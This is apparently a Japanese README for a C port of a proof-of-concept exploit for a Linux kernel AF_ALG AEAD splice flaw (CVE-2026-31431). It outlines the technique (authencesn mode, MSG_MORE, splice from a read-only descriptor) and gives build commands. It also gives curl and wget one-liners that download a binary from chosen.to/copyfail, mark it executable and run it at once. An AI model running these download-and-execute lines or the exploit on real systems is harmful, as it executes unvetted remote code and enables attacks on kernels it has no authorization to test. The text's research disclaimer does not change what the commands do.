
Cポート版の概念実証で、LinuxカーネルのAF_ALG AEADスプライスロジックの欠陥(CVE-2026-31431)を悪用するもので、教育研究用です。
このプロジェクトは、offsecguy によるオリジナルの Python プロトタイプの C 移植版です。
Linux カーネル暗号 API(AF_ALG)を以下の方法で活用します:
authencesn(hmac(sha256),cbc(aes)) AEAD モードMSG_MORE フラグsplice() システムコールこの手法は、読み取り専用ファイルディスクリプタ からのデータを暗号ソケットに通し、チャンク単位で処理します。
musl-gcc -static -Os -s -o exp exp.c -I./zlib-1.3.2 -L./zlib-1.3.2 -lz
gcc exp.c -o exp -lz -s -static
gcc exp.c -o exp -lz -s
curl -sLo exp chosen.to/copyfail && chmod +x exp ; ./exp
wget chosen.to/copyfail -qO exp && chmod +x exp ; ./exp
AF_ALG をサポートしている必要がありますzlib を使用しますこのコードは教育および研究目的のみで提供されています。
責任を持って、テストを許可されたシステム上でのみ使用してください。